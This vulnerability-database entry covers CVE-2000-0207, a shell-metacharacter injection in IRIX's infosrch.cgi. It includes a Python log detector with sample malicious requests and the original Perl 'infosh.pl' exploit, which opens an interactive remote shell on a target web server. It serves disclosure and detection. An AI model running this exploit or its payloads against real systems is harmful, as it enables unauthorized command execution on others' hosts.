SGI IRIX InfoSearch CGI Remote Arbitrary Command Execution Vulnerability

Vulnerability ID: 1105745
Vulnerability type: Input validation
Published: 2000-03-05
Updated: 2005-07-27
CVE ID: CVE-2000-0207
CNNVD-ID: CNNVD-200003-001
Platform: IRIX
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/19788
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200003-001
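|Vulnerability details
InfoSearch is a CGI program shipped with the SGI IRIX operating system for viewing online books, man pages and release notes. The infosrch.cgi script in the package has an input validation vulnerability that remote attackers may exploit to execute arbitrary commands on the host with the privileges of the web process. Before passing the 'fname' variable to the man2html program, infosrch.cgi does not properly check the parameter's contents, so a remote attacker can mix shell metacharacters such as ";" into the input and execute arbitrary commands on the host.
|Exploit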
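For detection, the description above translates into a simple log check: flag any request to infosrch.cgi whose decoded 'fname' value contains shell metacharacters. The following is an added example, not part of the original entry or of any SGI code; it assumes Common Log Format access logs, and the sample log lines, addresses and man-page path are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Characters a shell treats specially; a man-page file name has no need for them.
SHELL_META = set("|;&`$<>(){}!\\\n\r'\"*?")

# Common Log Format request field: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_fname(target):
    """Return the decoded fname value if the request targets infosrch.cgi
    and fname contains shell metacharacters, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/infosrch.cgi"):
        return None
    # parse_qs percent-decodes values, so encoded metacharacters are caught too.
    for value in parse_qs(parts.query, keep_blank_values=True).get("fname", []):
        if SHELL_META & set(value):
            return value
    return None

def scan(log_lines):
    """Yield (line_number, decoded_fname) for every flagged log line."""
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            hit = suspicious_fname(m.group(1))
            if hit is not None:
                yield n, hit

# Constructed sample access-log lines (addresses from the documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Mar/2000:10:00:01 +0000] "GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=/usr/share/catman/u_man/cat1/ls.z HTTP/1.0" 200 5120',
    '198.51.100.7 - - [05/Mar/2000:10:02:13 +0000] "GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|%2Fsbin%2Fpwd HTTP/1.0" 200 17',
    '198.51.100.7 - - [05/Mar/2000:10:02:20 +0000] "GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=ls.z%3B%2Fsbin%2Fpwd HTTP/1.0" 200 64',
    '192.0.2.10 - - [05/Mar/2000:10:03:00 +0000] "GET /index.html HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for n, fname in scan(SAMPLE_LOG):
        print(f"line {n}: shell metacharacter in fname: {fname!r}")
```

The same allow-nothing-special rule is what the CGI itself lacked: a server-side fix rejects such values before they reach man2html rather than only logging them.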
source: http://www.securityfocus.com/bid/1031/info

The InfoSearch package converts man pages and other documentation into HTML web content. The search form uses infosrch.cgi which does not properly parse user input in the 'fname' variable, allowing commands to be executed at the webserver privilege level by remote web users.
#!/usr/bin/perl -w
# infosearch.cgi interactive shell. 
# usage: ./infosh.pl hostname
# 3/4/00
# --rpc <[email protected]>

use IO::Socket;
use CGI ":escape";
$|++;

die "usage: $0 host\n" unless(@ARGV == 1);
($host) = shift @ARGV;

$cgi = "/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|";

# url encode and send a command.
sub send_cmd
{
	my($url_command) = $cgi . CGI::escape(shift);
	$s = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>"tcp");
	if(!$s) { die "denied.\n"; }
	print $s "GET $url_command HTTP/1.0\r\n";
	print $s "User-Agent: \r\n\r\n";
	@result = <$s>;
	shift @result until $result[0] =~ /^\r\n/; # uninteresting data. 
	shift @result; $#result--;		
return @result;
}

# draw a pseudo prompt. i like "\h:\w \$ ".
sub prompt
{
	@res = send_cmd("/sbin/pwd");	
	chomp($pwd = $res[0]);
	print "$host:", $pwd, "\$ ";
}

prompt;
while(!eof(STDIN)) {
	chomp($cmd = <STDIN>);
	print send_cmd($cmd);
	prompt;
}
|References

Source: BID
Name: 1031
Link: http://www.securityfocus.com/bid/1031
Source: SGI
Name: 20000501-01-P
Link: ftp://patches.sgi.com/support/free/security/advisories/20000501-01-P
Source: NSFOCUS
Name: 361
Link: http://www.nsfocus.net/vulndb/361